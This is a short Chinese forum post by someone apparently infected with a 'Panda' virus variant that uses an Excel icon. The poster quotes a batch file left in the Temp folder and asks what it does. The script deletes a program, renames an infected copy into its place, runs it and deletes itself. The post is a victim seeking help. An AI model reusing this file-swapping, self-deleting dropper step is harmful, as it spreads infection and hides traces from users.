中了熊猫之后留下的文件,看下什么意思?熊猫变种竟然是 EXCEL 的图标!
中了熊猫之后留下的文件,看下什么意思?熊猫变种竟然是 EXCEL 的图标!
在临时文件夹
C:\Documents and Settings\Administrator\Local Settings\Temp
里 的文件,名称:77$$.bat
:try1
del "D:\sale\cy.exe"
if exist "D:\sale\cy.exe" goto try1
ren "D:\sale\cy.exe.exe" "cy.exe"
if exist "D:\sale\cy.exe.exe" goto try2
"D:\sale\cy.exe"
:try2
del %0
由于 cy.exe 一直在运行,估计熊猫修改不掉
看懂了一点,如果 存在 cy.exe 返回 try1 删除文件
如果存在 cy.exe.exe 返回 try2
但是
:try2
del %0
这个起什么作用啊?
还看到了 熊猫变种竟然是 EXCEL 的图标!!!
真狠啊!!靠。。。。